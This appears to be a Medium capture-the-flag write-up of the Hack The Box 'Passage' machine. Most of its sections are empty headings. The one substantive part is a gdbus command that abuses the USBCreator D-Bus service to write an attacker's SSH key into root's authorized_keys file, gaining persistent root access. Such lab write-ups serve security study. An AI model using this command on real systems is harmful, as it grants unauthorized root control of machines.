Hack The Box — Passage

What we will do ?

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

1. Information Gathering

2. Scanning

3. Gaining Access

4. Maintaining Access

gdbus  call  --system --dest com.ubuntu.USBCreator  --object-path /com/ubuntu/USBCreator  --method com.ubuntu.USBCreator.Image /home/nadav/eslam_rsa.pub  /root/.ssh/authorized_keys true

Stay in touch

--

--

--

Offensive Security Enthusiast — twitter @eslam3kll

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Setting up the NAT Gateway to achieve a secured WordPress environment on the AWS platform for…

Hello World

Data Ingestion to Cloud SQL from GCS with Apache Beam in Python using Google Dataflow

How does strange code hide errors? TensorFlow.NET Analysis

Python Learning Series -2

What’s worth your attention when hiring app developers? — BLAKIT — IT Solutions

Understanding crashes Part 1

Before you begin with Microsoft Graph API

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eslam Akl

Eslam Akl

Offensive Security Enthusiast — twitter @eslam3kll

More from Medium

New CRODO.IO partnership with CronaSwap project

[Fixed] Mac Update Stuck on “Checking for updates…”

BEHAVIOR INCENTIVE MINING In the early day decentralized finance (DeFi) used automated market…

ICO launched